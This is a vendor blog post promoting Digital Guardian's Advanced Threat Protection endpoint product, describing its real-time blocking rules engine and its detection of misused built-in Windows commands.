Inside Digital Guardian's Advanced Threat Protection: Part Three

by Tim Bandos on Wednesday November 15, 2017

In today's blog, the last in a three part series, we break down what differentiates Digital Guardian's Advanced Threat Protection capabilities from other endpoint detection response products. Read the first part in this series here and the second part here.

Advanced Threat Protection:

What differentiates ATP from other EDR type products is its ability to not only detect, but actually block activity in real-time. If your signatures and detections are all server-side and generated after logs have been sent up, this is not Real-Time. Adding in the ability for Real-Time Prevention is the ultimate goal in order to successfully thwart impending attacks. Digital Guardian’s ATP product has this capability via the rules engine. It can also block based on any component of metadata observed within the logs. If you want to block a binary that has a specific Signature Issuer because it’s been recently reported that the signing Company has been compromised, no problem! If you want to block binaries that have no Company Name, Product Version, and are executed from a temporary directory; no problem! Our rules engine can do all the above and then some, which puts the power into your hands, and not just what your security vendor tells you to block on.

ATP is by no means considered a full Anti-Virus replacement. Although it does a great job at detecting malware, it’s really designed to be much more than that - covering gaps that are commonly missed by traditional AV. A great example of what AV misses is the common misuse of built-in Windows commands being used for nefarious purposes. If an email attachment contains a malicious piece of JavaScript that simply calls on PowerShell to download and execute a binary from the internet, ATP has the ability to detect that entire attack cycle. It can also continuously be extended as new threat intelligence is acquired or new tactics, techniques, procedures are observed in the wild.

Ultimately leveraging both Real-Time Detection and Historical Detection capabilities provides a more encompassing and layered approach to host-based threat detection. Digital Guardian’s ATP technology employs both to ensure incident responders and security analysts are well equipped to deter, detect, and neutralize cyber-attacks.